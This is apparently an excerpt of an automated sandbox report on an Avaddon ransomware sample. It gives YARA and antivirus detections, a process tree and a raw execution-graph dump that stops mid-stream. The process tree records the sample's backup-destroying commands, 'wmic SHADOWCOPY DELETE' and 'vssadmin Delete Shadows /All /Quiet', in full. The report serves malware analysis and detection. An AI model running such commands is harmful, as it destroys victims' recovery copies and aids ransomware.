                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321666234.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.317170385.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        General

                        Start time:16:47:34
                        Start date:06/01/2022
                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                        Imagebase:0x12f0000
                        File size:794112 bytes
                        MD5 hash:0B486FE0503524CFE4726A4022FA6A68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000002.00000002.309597830.000000000069A000.00000004.00000020.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 88%, Virustotal, Browse
                        • Detection: 66%, Metadefender, Browse
                        • Detection: 96%, ReversingLabs
                        Reputation:low

                        General

                        Start time:16:47:35
                        Start date:06/01/2022
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic SHADOWCOPY DELETE /nointeractive
                        Imagebase:0x7ff6dc4e0000
                        File size:521728 bytes
                        MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:16:47:36
                        Start date:06/01/2022
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic SHADOWCOPY DELETE /nointeractive
                        Imagebase:0x7ff6dc4e0000
                        File size:521728 bytes
                        MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:16:47:36
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:47:36
                        Start date:06/01/2022
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic SHADOWCOPY DELETE /nointeractive
                        Imagebase:0x7ff6dc4e0000
                        File size:521728 bytes
                        MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:16:47:36
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:47:37
                        Start date:06/01/2022
                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                        Wow64 process (32bit):true
                        Commandline:wmic SHADOWCOPY DELETE /nointeractive
                        Imagebase:0x950000
                        File size:391680 bytes
                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:47:37
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:47:37
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:47:38
                        Start date:06/01/2022
                        Path:C:\Windows\SysWOW64\vssadmin.exe
                        Wow64 process (32bit):true
                        Commandline:vssadmin Delete Shadows /All /Quiet
                        Imagebase:0x13b0000
                        File size:110592 bytes
                        MD5 hash:7E30B94672107D3381A1D175CF18C147
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:16:47:39
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:47:40
                        Start date:06/01/2022
                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                        Wow64 process (32bit):true
                        Commandline:wmic SHADOWCOPY DELETE /nointeractive
                        Imagebase:0x950000
                        File size:391680 bytes
                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:41
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:42
                        Start date:06/01/2022
                        Path:C:\Windows\SysWOW64\vssadmin.exe
                        Wow64 process (32bit):true
                        Commandline:vssadmin Delete Shadows /All /Quiet
                        Imagebase:0x13b0000
                        File size:110592 bytes
                        MD5 hash:7E30B94672107D3381A1D175CF18C147
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:42
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:43
                        Start date:06/01/2022
                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                        Wow64 process (32bit):true
                        Commandline:wmic SHADOWCOPY DELETE /nointeractive
                        Imagebase:0x950000
                        File size:391680 bytes
                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:44
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:45
                        Start date:06/01/2022
                        Path:C:\Windows\SysWOW64\vssadmin.exe
                        Wow64 process (32bit):true
                        Commandline:vssadmin Delete Shadows /All /Quiet
                        Imagebase:0x13b0000
                        File size:110592 bytes
                        MD5 hash:7E30B94672107D3381A1D175CF18C147
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:47:46
                        Start date:06/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:16:48:34
                        Start date:06/01/2022
                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                        Imagebase:0x12f0000
                        File size:794112 bytes
                        MD5 hash:0B486FE0503524CFE4726A4022FA6A68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000023.00000002.438770513.0000000001537000.00000004.00000020.sdmp, Author: Joe Security

                        Disassembly

                        Code Analysis

                          Execution Graph

                          Execution Coverage:10.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:29.3%
                          Total number of Nodes:1459
                          Total number of Limit Nodes:11

                          Graph

21178->21179 21180 1303d50 26 API calls 21179->21180 21181 130e442 21180->21181 21182 130e6a0 5 API calls 21181->21182 21183 130e458 21182->21183 21184 1303d50 26 API calls 21183->21184 21185 130e465 21184->21185 21186 132ea79 _ValidateLocalCookies 5 API calls 21185->21186 21187 130e2e7 21186->21187 21187->20536 21189 130e6c5 21188->21189 21190 1307a70 5 API calls 21189->21190 21191 130e412 21190->21191 21191->21176 21193 130ad43 21192->21193 21194 1303aa0 26 API calls 21193->21194 21195 130ad59 21194->21195 21196 12f93f0 79 API calls 21195->21196 21197 130ae05 21196->21197 21198 12f93f0 79 API calls 21197->21198 21199 130ae1b 21198->21199 21518 130a920 21199->21518 21206 130ae63 21208 130aec1 21206->21208 21579 12f56a0 25 API calls 2 library calls 21206->21579 21207 12f54c0 26 API calls 21207->21206 21210 130aeff 21208->21210 21580 12f56a0 25 API calls 2 library calls 21208->21580 21212 130af3d 21210->21212 21581 12f56a0 25 API calls 2 library calls 21210->21581 21214 130af78 21212->21214 21582 12f56a0 25 API calls 2 library calls 21212->21582 21215 130afb4 21214->21215 21583 12f56a0 25 API calls 2 library calls 21214->21583 21218 12f93f0 79 API calls 21215->21218 21219 130afc7 21218->21219 21220 12f93f0 79 API calls 21219->21220 21221 130afdd 21220->21221 21222 130a920 27 API calls 21221->21222 21223 130afee 21222->21223 21224 12fc470 26 API calls 21223->21224 21225 130b000 21224->21225 21226 130b00f 21225->21226 21227 12f54c0 26 API calls 21225->21227 21228 130b06a 21226->21228 21584 12f56a0 25 API calls 2 library calls 21226->21584 21227->21226 21230 130b0a2 21228->21230 21585 12f56a0 25 API calls 2 library calls 21228->21585 21232 130b0e0 21230->21232 21586 12f56a0 25 API calls 2 library calls 21230->21586 21234 130b122 21232->21234 21587 12f56a0 25 API calls 2 library calls 21232->21587 21235 12f93f0 79 API calls 21234->21235 21237 130b135 21235->21237 21238 12f93f0 79 API calls 21237->21238 21239 130b14b 21238->21239 21240 130a920 27 API calls 21239->21240 
21241 130b15c 21240->21241 21242 12fc470 26 API calls 21241->21242 21243 130b16e 21242->21243 21244 130b17d 21243->21244 21245 12f54c0 26 API calls 21243->21245 21246 130b1d8 21244->21246 21588 12f56a0 25 API calls 2 library calls 21244->21588 21245->21244 21247 130b210 21246->21247 21589 12f56a0 25 API calls 2 library calls 21246->21589 21250 130b24e 21247->21250 21590 12f56a0 25 API calls 2 library calls 21247->21590 21252 130b290 21250->21252 21591 12f56a0 25 API calls 2 library calls 21250->21591 21254 12f93f0 79 API calls 21252->21254 21255 130b2a3 21254->21255 21256 130a920 27 API calls 21255->21256 21257 130b2b4 21256->21257 21258 130b2c0 21257->21258 21259 12f54c0 26 API calls 21257->21259 21260 130b31b 21258->21260 21592 12f56a0 25 API calls 2 library calls 21258->21592 21259->21258 21262 130b357 21260->21262 21593 12f56a0 25 API calls 2 library calls 21260->21593 21264 12f93f0 79 API calls 21262->21264 21265 130b36a 21264->21265 21266 130a920 27 API calls 21265->21266 21267 130b37b 21266->21267 21268 130b387 21267->21268 21269 12f54c0 26 API calls 21267->21269 21270 130b3e2 21268->21270 21594 12f56a0 25 API calls 2 library calls 21268->21594 21269->21268 21272 130b41e 21270->21272 21595 12f56a0 25 API calls 2 library calls 21270->21595 21274 12f93f0 79 API calls 21272->21274 21275 130b431 21274->21275 21276 130a920 27 API calls 21275->21276 21277 130b442 21276->21277 21278 130b44e 21277->21278 21279 12f54c0 26 API calls 21277->21279 21280 130b4a9 21278->21280 21596 12f56a0 25 API calls 2 library calls 21278->21596 21279->21278 21282 130b4e5 21280->21282 21597 12f56a0 25 API calls 2 library calls 21280->21597 21284 12f93f0 79 API calls 21282->21284 21285 130b4f8 21284->21285 21286 12f93f0 79 API calls 21285->21286 21287 130b50e 21286->21287 21288 130a920 27 API calls 21287->21288 21289 130b51f 21288->21289 21290 12fc470 26 API calls 21289->21290 21291 130b531 21290->21291 21292 130b540 21291->21292 21293 12f54c0 26 API calls 21291->21293 21297 130b59b 
21292->21297 21598 12f56a0 25 API calls 2 library calls 21292->21598 21293->21292 21295 130b611 21300 130b653 21295->21300 21601 12f56a0 25 API calls 2 library calls 21295->21601 21296 130b5d3 21296->21295 21600 12f56a0 25 API calls 2 library calls 21296->21600 21297->21296 21599 12f56a0 25 API calls 2 library calls 21297->21599 21302 12f93f0 79 API calls 21300->21302 21303 130b666 21302->21303 21304 130a920 27 API calls 21303->21304 21305 130b677 21304->21305 21306 130b683 21305->21306 21307 12f54c0 26 API calls 21305->21307 21308 130b6de 21306->21308 21602 12f56a0 25 API calls 2 library calls 21306->21602 21307->21306 21310 130b71a 21308->21310 21603 12f56a0 25 API calls 2 library calls 21308->21603 21312 12f93f0 79 API calls 21310->21312 21313 130b72d 21312->21313 21314 130a920 27 API calls 21313->21314 21315 130b73e 21314->21315 21316 130b74a 21315->21316 21317 12f54c0 26 API calls 21315->21317 21318 130b7a5 21316->21318 21604 12f56a0 25 API calls 2 library calls 21316->21604 21317->21316 21320 130b7e1 21318->21320 21605 12f56a0 25 API calls 2 library calls 21318->21605 21322 12f93f0 79 API calls 21320->21322 21323 130b7f4 21322->21323 21324 130b800 21323->21324 21325 12f54c0 26 API calls 21323->21325 21326 130b862 21324->21326 21606 12f56a0 25 API calls 2 library calls 21324->21606 21325->21324 21328 12f93f0 79 API calls 21326->21328 21329 130b875 21328->21329 21330 130b881 21329->21330 21331 12f54c0 26 API calls 21329->21331 21332 130b8e3 21330->21332 21607 12f56a0 25 API calls 2 library calls 21330->21607 21331->21330 21334 12f93f0 79 API calls 21332->21334 21335 130b8f6 21334->21335 21336 130b902 21335->21336 21337 12f54c0 26 API calls 21335->21337 21338 130b964 21336->21338 21608 12f56a0 25 API calls 2 library calls 21336->21608 21337->21336 21340 12f93f0 79 API calls 21338->21340 21341 130b977 21340->21341 21342 130b983 21341->21342 21343 12f54c0 26 API calls 21341->21343 21344 130b9e5 21342->21344 21609 12f56a0 25 API calls 2 library calls 21342->21609 
21343->21342 21345 12f93f0 79 API calls 21344->21345 21347 130b9f8 21345->21347 21348 130ba04 21347->21348 21349 12f54c0 26 API calls 21347->21349 21350 130ba66 21348->21350 21610 12f56a0 25 API calls 2 library calls 21348->21610 21349->21348 21352 12f93f0 79 API calls 21350->21352 21353 130ba79 21352->21353 21354 130ba85 21353->21354 21355 12f54c0 26 API calls 21353->21355 21356 130bae7 21354->21356 21611 12f56a0 25 API calls 2 library calls 21354->21611 21355->21354 21358 12f93f0 79 API calls 21356->21358 21359 130bafa 21358->21359 21360 12f93f0 79 API calls 21359->21360 21361 130bb10 21360->21361 21362 130a920 27 API calls 21361->21362 21363 130bb21 21362->21363 21364 12f8470 26 API calls 21363->21364 21365 130bb37 21364->21365 21366 12fc470 26 API calls 21365->21366 21367 130bb49 21366->21367 21368 12f8470 26 API calls 21367->21368 21369 130bb5f 21368->21369 21370 130bb6e 21369->21370 21371 12f54c0 26 API calls 21369->21371 21372 130bbc9 21370->21372 21612 12f56a0 25 API calls 2 library calls 21370->21612 21371->21370 21374 130bc01 21372->21374 21613 12f56a0 25 API calls 2 library calls 21372->21613 21376 130bc3f 21374->21376 21614 12f56a0 25 API calls 2 library calls 21374->21614 21377 130bc7d 21376->21377 21615 12f56a0 25 API calls 2 library calls 21376->21615 21380 130bcbb 21377->21380 21616 12f56a0 25 API calls 2 library calls 21377->21616 21382 130bcfd 21380->21382 21617 12f56a0 25 API calls 2 library calls 21380->21617 21384 12f93f0 79 API calls 21382->21384 21385 130bd10 21384->21385 21386 12f93f0 79 API calls 21385->21386 21387 130bd26 21386->21387 21388 130a920 27 API calls 21387->21388 21389 130bd37 21388->21389 21390 12fc470 26 API calls 21389->21390 21391 130bd49 21390->21391 21392 130bd60 21391->21392 21393 12f54c0 26 API calls 21391->21393 21394 130bdbf 21392->21394 21618 12f56a0 25 API calls 2 library calls 21392->21618 21393->21392 21396 130bdfa 21394->21396 21619 12f56a0 25 API calls 2 library calls 21394->21619 21397 130be32 21396->21397 21620 
12f56a0 25 API calls 2 library calls 21396->21620 21400 130be74 21397->21400 21621 12f56a0 25 API calls 2 library calls 21397->21621 21402 12f93f0 79 API calls 21400->21402 21403 130be87 21402->21403 21404 12f93f0 79 API calls 21403->21404 21405 130be9d 21404->21405 21406 130a920 27 API calls 21405->21406 21407 130beae 21406->21407 21408 12fc470 26 API calls 21407->21408 21409 130bec0 21408->21409 21410 130bed7 21409->21410 21411 12f54c0 26 API calls 21409->21411 21412 130bf36 21410->21412 21622 12f56a0 25 API calls 2 library calls 21410->21622 21411->21410 21414 130bf71 21412->21414 21623 12f56a0 25 API calls 2 library calls 21412->21623 21416 130bfa9 21414->21416 21624 12f56a0 25 API calls 2 library calls 21414->21624 21417 130bfeb 21416->21417 21625 12f56a0 25 API calls 2 library calls 21416->21625 21420 12f93f0 79 API calls 21417->21420 21421 130bffe 21420->21421 21422 12f93f0 79 API calls 21421->21422 21423 130c014 21422->21423 21424 130a920 27 API calls 21423->21424 21425 130c025 21424->21425 21426 12fc470 26 API calls 21425->21426 21427 130c037 21426->21427 21428 130c04e 21427->21428 21429 12f54c0 26 API calls 21427->21429 21430 130c0ad 21428->21430 21626 12f56a0 25 API calls 2 library calls 21428->21626 21429->21428 21432 130c0e8 21430->21432 21627 12f56a0 25 API calls 2 library calls 21430->21627 21434 130c120 21432->21434 21628 12f56a0 25 API calls 2 library calls 21432->21628 21436 130c162 21434->21436 21629 12f56a0 25 API calls 2 library calls 21434->21629 21437 12f93f0 79 API calls 21436->21437 21439 130c175 21437->21439 21440 12f93f0 79 API calls 21439->21440 21441 130c18b 21440->21441 21442 130a920 27 API calls 21441->21442 21443 130c19c 21442->21443 21444 12fc470 26 API calls 21443->21444 21445 130c1ae 21444->21445 21446 130c1c5 21445->21446 21447 12f54c0 26 API calls 21445->21447 21448 130c224 21446->21448 21630 12f56a0 25 API calls 2 library calls 21446->21630 21447->21446 21449 130c25f 21448->21449 21631 12f56a0 25 API calls 2 library calls 
21448->21631 21452 130c297 21449->21452 21632 12f56a0 25 API calls 2 library calls 21449->21632 21454 130c2d9 21452->21454 21633 12f56a0 25 API calls 2 library calls 21452->21633 21456 12f93f0 79 API calls 21454->21456 21457 130c2ec 21456->21457 21458 12f93f0 79 API calls 21457->21458 21459 130c302 21458->21459 21460 130a920 27 API calls 21459->21460 21461 130c313 21460->21461 21462 12fc470 26 API calls 21461->21462 21463 130c325 21462->21463 21464 130c33c 21463->21464 21465 12f54c0 26 API calls 21463->21465 21466 130c39b 21464->21466 21634 12f56a0 25 API calls 2 library calls 21464->21634 21465->21464 21468 130c3d6 21466->21468 21635 12f56a0 25 API calls 2 library calls 21466->21635 21469 130c40e 21468->21469 21636 12f56a0 25 API calls 2 library calls 21468->21636 21472 130c450 21469->21472 21637 12f56a0 25 API calls 2 library calls 21469->21637 21474 12f93f0 79 API calls 21472->21474 21475 130c463 21474->21475 21476 12f93f0 79 API calls 21475->21476 21477 130c479 21476->21477 21478 130a920 27 API calls 21477->21478 21479 130c48a 21478->21479 21480 12fc470 26 API calls 21479->21480 21481 130c49c 21480->21481 21482 130c4b4 21481->21482 21483 12f54c0 26 API calls 21481->21483 21484 130c512 21482->21484 21638 12f56a0 25 API calls 2 library calls 21482->21638 21483->21482 21486 130c54d 21484->21486 21639 12f56a0 25 API calls 2 library calls 21484->21639 21488 130c585 21486->21488 21640 12f56a0 25 API calls 2 library calls 21486->21640 21489 130c5c3 21488->21489 21641 12f56a0 25 API calls 2 library calls 21488->21641 21537 130c7c0 21489->21537 21494 130c7c0 25 API calls 21495 130c5d2 21494->21495 21497 130c633 21495->21497 21642 1307e90 26 API calls 2 library calls 21495->21642 21499 130c68e 21497->21499 21643 1307e90 26 API calls 2 library calls 21497->21643 21500 130c6e8 21499->21500 21501 12f51b0 26 API calls 21499->21501 21502 12f93f0 79 API calls 21500->21502 21501->21500 21503 130c6f8 21502->21503 21508 130c712 21503->21508 21644 12f54a0 25 API calls _Maklocstr 
21503->21644 21541 12f4f30 21508->21541 21515 130c78c 21516 132ea79 _ValidateLocalCookies 5 API calls 21515->21516 21517 130c7ad 21516->21517 21517->20541 21519 130a960 21518->21519 21520 130aa3f 21518->21520 21521 12f57d0 _Maklocstr 26 API calls 21519->21521 21522 12f51b0 26 API calls 21520->21522 21526 130a978 collate 21521->21526 21523 130a9e2 21522->21523 21524 132ea79 _ValidateLocalCookies 5 API calls 21523->21524 21525 130aa75 21524->21525 21530 12fc470 21525->21530 21527 130a9ca GetEnvironmentVariableW 21526->21527 21527->21523 21528 130a9db 21527->21528 21528->21523 21645 12f6190 26 API calls 3 library calls 21528->21645 21646 12fc4e0 21530->21646 21532 12fc486 21533 12f8470 21532->21533 21534 12f8481 21533->21534 21534->21534 21535 12f5330 26 API calls 21534->21535 21536 12f849b 21535->21536 21536->21206 21536->21207 21538 130c5cc 21537->21538 21540 130c7d5 _Maklocstr 21537->21540 21538->21494 21539 12f56a0 25 API calls _Maklocstr 21539->21540 21540->21538 21540->21539 21542 12f4f4a 21541->21542 21543 12f4f3b 21541->21543 21545 130cc00 21542->21545 21660 12f56a0 25 API calls 2 library calls 21543->21660 21546 130cc37 21545->21546 21547 1303d50 26 API calls 21546->21547 21548 130cc6c 21547->21548 21661 130dab0 21548->21661 21551 1303d50 26 API calls 21552 130cc8f 21551->21552 21553 130dab0 5 API calls 21552->21553 21554 130cca5 21553->21554 21555 1303d50 26 API calls 21554->21555 21556 130ccb2 21555->21556 21557 130dab0 5 API calls 21556->21557 21558 130ccc8 21557->21558 21559 1303d50 26 API calls 21558->21559 21560 130ccd5 21559->21560 21561 132ea79 _ValidateLocalCookies 5 API calls 21560->21561 21562 130c774 21561->21562 21563 1308300 21562->21563 21564 1308311 21563->21564 21565 1308321 21563->21565 21665 12f56a0 25 API calls 2 library calls 21564->21665 21567 130ac50 21565->21567 21568 130ac60 21567->21568 21572 130ac8f 21567->21572 21666 12f5650 25 API calls _Maklocstr 21568->21666 21570 130ac69 21667 12f56a0 25 API calls 2 library calls 21570->21667 
21573 130abc0 21572->21573 21574 130abd0 21573->21574 21575 130abff 21573->21575 21668 12f5650 25 API calls _Maklocstr 21574->21668 21575->21515 21577 130abd9 21669 12f56a0 25 API calls 2 library calls 21577->21669 21642->21497 21643->21499 21644->21508 21645->21523 21647 12fc51d 21646->21647 21648 12fc69d 21647->21648 21649 12fc5f8 21647->21649 21654 12fc522 _Maklocstr 21647->21654 21658 12f4b30 26 API calls _Maklocstr 21648->21658 21651 12fc6a2 21649->21651 21652 12fc62d 21649->21652 21659 12f4a60 26 API calls 2 library calls 21651->21659 21655 12f57d0 _Maklocstr 26 API calls 21652->21655 21654->21532 21657 12fc636 _Maklocstr collate 21655->21657 21656 12fc6a7 21657->21532 21658->21651 21659->21656 21662 130dad5 21661->21662 21663 1307a70 5 API calls 21662->21663 21664 130cc82 21663->21664 21664->21551 21666->21570 21668->21577 21671 1308604 21670->21671 21672 1303aa0 26 API calls 21671->21672 21673 130861a 21672->21673 21686 1308a50 21673->21686 21678 1308792 21680 132ea79 _ValidateLocalCookies 5 API calls 21678->21680 21681 13087fb 21680->21681 21681->20497 21682 12f51b0 26 API calls 21683 13086cd 21682->21683 21683->21678 21683->21682 21707 1349877 21683->21707 21722 130a320 26 API calls 2 library calls 21683->21722 21723 12f56a0 25 API calls 2 library calls 21683->21723 21687 1308a87 21686->21687 21688 1303d50 26 API calls 21687->21688 21689 1308abc 21688->21689 21724 130a4c0 21689->21724 21692 1303d50 26 API calls 21693 1308adf 21692->21693 21694 130a4c0 5 API calls 21693->21694 21695 1308af5 21694->21695 21696 1303d50 26 API calls 21695->21696 21697 1308b02 21696->21697 21698 130a4c0 5 API calls 21697->21698 21699 1308b18 21698->21699 21700 1303d50 26 API calls 21699->21700 21701 1308b25 21700->21701 21702 132ea79 _ValidateLocalCookies 5 API calls 21701->21702 21703 13086aa 21702->21703 21704 130a220 GetSystemInfo 21703->21704 21705 132ea79 _ValidateLocalCookies 5 API calls 21704->21705 21706 13086af CreateIoCompletionPort 21705->21706 21706->21678 
21706->21683 21708 1349884 21707->21708 21709 1349898 21707->21709 21737 134b45f 14 API calls __Wcscoll 21708->21737 21728 1349827 21709->21728 21712 1349889 21738 13496ba 25 API calls _Maklocstr 21712->21738 21715 13498ad CreateThread 21717 13498cc GetLastError 21715->21717 21718 13498d8 21715->21718 21748 134971b 21715->21748 21716 1349894 21716->21683 21739 134b429 14 API calls 3 library calls 21717->21739 21740 1349799 21718->21740 21722->21683 21725 130a4e5 21724->21725 21726 1307a70 5 API calls 21725->21726 21727 1308ad2 21726->21727 21727->21692 21729 1355c32 __Wcscoll 14 API calls 21728->21729 21730 1349838 21729->21730 21731 1355c8f _free 14 API calls 21730->21731 21732 1349845 21731->21732 21733 134984c GetModuleHandleExW 21732->21733 21734 1349869 21732->21734 21733->21734 21735 1349799 16 API calls 21734->21735 21736 1349871 21735->21736 21736->21715 21736->21718 21737->21712 21738->21716 21739->21718 21741 13497a5 21740->21741 21742 13497c9 21740->21742 21743 13497b4 21741->21743 21744 13497ab CloseHandle 21741->21744 21742->21683 21745 13497c3 21743->21745 21746 13497ba FreeLibrary 21743->21746 21744->21743 21747 1355c8f _free 14 API calls 21745->21747 21746->21745 21747->21742 21749 1349727 std::locale::_Setgloballocale 21748->21749 21750 134972e GetLastError ExitThread 21749->21750 21751 134973b 21749->21751 21752 13559e0 __Getctype 76 API calls 21751->21752 21753 1349740 21752->21753 21762 13565ab 6 API calls 21753->21762 21755 134974b 21756 1349757 21755->21756 21763 135649f 5 API calls std::_Locinfo::_Locinfo_Addcats 21755->21763 21764 13498fa 17 API calls 21756->21764 21762->21755 21763->21756 21765->20558 21766->20564 21767->20568 21771 1315bb3 CoInitializeEx CoInitializeSecurity 21770->21771 21772 13155fe 21770->21772 21771->20579 21847 12f8140 26 API calls 2 library calls 21772->21847 21774 131560b 21775 12f93f0 79 API calls 21774->21775 21776 1315618 21775->21776 21777 1315624 21776->21777 21778 12f54c0 26 API calls 21776->21778 21779 
